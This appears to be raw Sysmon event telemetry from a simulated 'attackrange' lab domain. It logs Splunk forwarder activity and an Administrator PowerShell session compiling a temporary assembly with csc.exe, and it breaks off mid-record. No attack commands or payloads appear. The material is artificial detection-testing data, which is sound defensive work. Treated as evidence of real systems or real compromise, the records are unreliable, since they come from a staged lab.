23542300x8000000000000000246536Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:33:05.148{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E7EDFFFAAF8887BA6904CD0DDA127287,SHA256=6BF0709BA6725FCC25C076772D1F0650BB9C43FD6C887847C20A84C098CE4A39,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000246535Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:33:05.148{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F17E09CA3983A314E040DA678A32B57D,SHA256=E253344293D0FD82D45458B282516F2CA8015C6EBF696488A1AB5207D1A91DAD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000246534Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:33:05.132{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7D2F1CA4411D4C3F561B0D48B260527E,SHA256=746B156FD4F2144EC92744A9ED96CD3DC51C54D4687F59C98FFEFF4256423427,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061672Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:06.337{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AE264BE083F7524D98E10E8DE78829CC,SHA256=7FE67C03D035F9BB6618EEAE6221D1595F2A0A86F6ADFE4EBF006E76B4C33CB9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000246538Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:33:06.132{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=86FA4AE7D00E9E2DA1D6B9915CF4A8B3,SHA256=D22EB4FD07FF4AE4561A14A782DA5D685BCF7A1B96956B32EC42BAA4A9C5C8CA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061674Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:07.821{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=24FB95D51813D49134E9F7EC74758501,SHA256=5587D174FA10610CF93A24224622787C8631E910FB38A2D052EAB44AA743C920,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001061673Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:04.960{7F8C56E7-4E56-6063-7600-00000000AF01}3780C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-877.attackrange.local54856-false10.0.1.12-8000- 23542300x8000000000000000246539Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:33:07.132{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=85BC1C02F95851179EC99B2CA246E2DD,SHA256=B9DE6DE4A3308390988E2C0A7DF1E171062DFD19D11196985FEF8C0DB9EA6DB4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000246540Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:33:08.132{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=38973E074C8EE9A6597B28D3F42C03F1,SHA256=666C6E1747F1660C0D802B219286305839FB410F14BFB578EEF6004E97F1FCDF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061675Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:09.181{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B8FD5DE5FFE50128F4784409F0553EEB,SHA256=4EE41C4AB52A0C37CF4DC0A9DF77BDC1249D24C5D8BB9C9C8DFAC580A7080B02,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000246541Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:33:09.132{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5770F54101EE169898555B43CB4EE389,SHA256=7AE66F4E442AF6386C5F33AA90FDC70E2258E1AA6C831F08213D6F2ED94F160A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061720Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:10.666{7F8C56E7-4F87-6063-C900-00000000AF01}5652ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\tpnd2qsw\tpnd2qsw.cmdlineMD5=07FDBF3785EFE9807F78B64AF02DDA15,SHA256=D9F03B988C58F4D350E2EC44384185F46988D58E60D032F5AEB85D5DFB59F653,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061719Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:10.666{7F8C56E7-4F87-6063-C900-00000000AF01}5652ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\tpnd2qsw\tpnd2qsw.outMD5=1DBF731A6FDD382FDAE65A08A9C0ECDD,SHA256=D86C4127032DFD7E05D0734B39B4C10C7F84BAB7E1FBBF59B91D963B3E06834E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061718Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:10.666{7F8C56E7-4F87-6063-C900-00000000AF01}5652ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\tpnd2qsw\tpnd2qsw.0.csMD5=10E9ABF0FAE68083CD0F74B09AFF5337,SHA256=D5A895B2362348B06CF4EEC1C6C912F9BA19E882023309237AA479EDC6E9834E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061717Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:10.650{7F8C56E7-4F87-6063-C900-00000000AF01}5652ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\tpnd2qsw\tpnd2qsw.dllMD5=B50CC406404053E0E72A9B117424339F,SHA256=E993F44A3103CEB12C026A4217696132AA4B3AB75E7C8C07DCE327079EEC11CC,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x80000000000000001061716Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:10.650{7F8C56E7-52C6-6063-3E01-00000000AF01}3576ATTACKRANGE\AdministratorC:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeC:\Users\Administrator\AppData\Local\Temp\tpnd2qsw\CSCD0F6001CC1AA42C396BA6F871499B46D.TMPMD5=45E6471C8688B6C598A7DC7C30B5AAFC,SHA256=2A758514C630DCA6B0152D4375ECADB68772D07DF7914A591EBA199768EAEFCB,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001061715Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.localDLL2021-03-30 16:33:10.650{7F8C56E7-52C6-6063-3E01-00000000AF01}3576C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeC:\Users\Administrator\AppData\Local\Temp\tpnd2qsw\tpnd2qsw.dll2021-03-30 16:33:10.525 23542300x80000000000000001061714Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:10.650{7F8C56E7-52C6-6063-3E01-00000000AF01}3576ATTACKRANGE\AdministratorC:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeC:\Users\Administrator\AppData\Local\Temp\tpnd2qsw\tpnd2qsw.dllMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061713Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:10.650{7F8C56E7-52C6-6063-3E01-00000000AF01}3576ATTACKRANGE\AdministratorC:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeC:\Users\ADMINI~1\AppData\Local\Temp\RESCB4C.tmpMD5=01C5A4E7F3D89653D480EEE55EC834B2,SHA256=84BA25AE1E220DA08B6D341A62FF6978B8825FC140CC8C6E968D7AAA003CCCDB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061712Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:10.650{7F8C56E7-52C6-6063-3F01-00000000AF01}4860ATTACKRANGE\AdministratorC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Users\ADMINI~1\AppData\Local\Temp\RESCB4C.tmpMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001061711Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:10.634{7F8C56E7-4F87-6063-CA00-00000000AF01}55846056C:\Windows\system32\conhost.exe{7F8C56E7-52C6-6063-3F01-00000000AF01}4860C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061710Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:10.634{7F8C56E7-4E3C-6063-0C00-00000000AF01}8323108C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061709Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:10.634{7F8C56E7-4E3C-6063-0C00-00000000AF01}8323108C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061708Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:10.634{7F8C56E7-4E3C-6063-0C00-00000000AF01}8323108C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061707Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:10.634{7F8C56E7-4E4F-6063-5500-00000000AF01}38243840C:\Windows\system32\csrss.exe{7F8C56E7-52C6-6063-3F01-00000000AF01}4860C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001061706Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:10.634{7F8C56E7-4E3C-6063-0C00-00000000AF01}8323108C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061705Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:10.634{7F8C56E7-52C6-6063-3E01-00000000AF01}35765412C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe{7F8C56E7-52C6-6063-3F01-00000000AF01}4860C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+b46d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3db4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3f2c|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+4002|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+27b2|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+2804|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+2948|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+7fe06|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+4726f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+45e1f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+45b16|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+45826|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+1938a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+18bf6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+a831|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+1f0a49|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000001061704Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:10.641{7F8C56E7-52C6-6063-3F01-00000000AF01}4860C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe14.10.25028.0 built by: VCTOOLSD15RTMMicrosoft® Resource File To COFF Object Conversion UtilityMicrosoft® .NET FrameworkMicrosoft CorporationCVTRES.EXEC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\ADMINI~1\AppData\Local\Temp\RESCB4C.tmp" "c:\Users\Administrator\AppData\Local\Temp\tpnd2qsw\CSCD0F6001CC1AA42C396BA6F871499B46D.TMP"C:\Users\Administrator\ATTACKRANGE\Administrator{7F8C56E7-4E65-6063-912A-070000000000}0x72a912HighMD5=C877CBB966EA5939AA2A17B6A5160950,SHA256=1FE531EAC592B480AA4BD16052B909C3431434F17E7AE163D248355558CE43A6,IMPHASH=55D76ADE7FFEA0F41FF2B55505C2B362{7F8C56E7-52C6-6063-3E01-00000000AF01}3576C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Administrator\AppData\Local\Temp\tpnd2qsw\tpnd2qsw.cmdline" 10341000x80000000000000001061703Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:10.541{7F8C56E7-4F87-6063-CA00-00000000AF01}55846056C:\Windows\system32\conhost.exe{7F8C56E7-52C6-6063-3E01-00000000AF01}3576C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061702Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:10.541{7F8C56E7-4E3C-6063-0C00-00000000AF01}8323108C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061701Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:10.541{7F8C56E7-4E3C-6063-0C00-00000000AF01}8323108C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061700Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:10.541{7F8C56E7-4E3C-6063-0C00-00000000AF01}8323108C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061699Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:10.541{7F8C56E7-4E3C-6063-0C00-00000000AF01}8323108C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061698Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:10.541{7F8C56E7-4E4F-6063-5500-00000000AF01}38243840C:\Windows\system32\csrss.exe{7F8C56E7-52C6-6063-3E01-00000000AF01}3576C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001061697Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:10.541{7F8C56E7-4F87-6063-C900-00000000AF01}56526096C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{7F8C56E7-52C6-6063-3E01-00000000AF01}3576C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+384236|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2be405|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2be05f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2bdb80|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2bdb08|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2bc1c3|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+7d9461|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+7d886a|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P521220ea#\248750a67803cf70fc202269b0f06183\Microsoft.PowerShell.Commands.Utility.ni.dll+2a60(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P521220ea#\248750a67803cf70fc202269b0f06183\Microsoft.PowerShell.Commands.Utility.ni.dll+2a60(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+bc6394ba(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+bc61347c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+bc6130b7(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+bd0db3b5(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+bc5d0029(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+bc633a9b(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#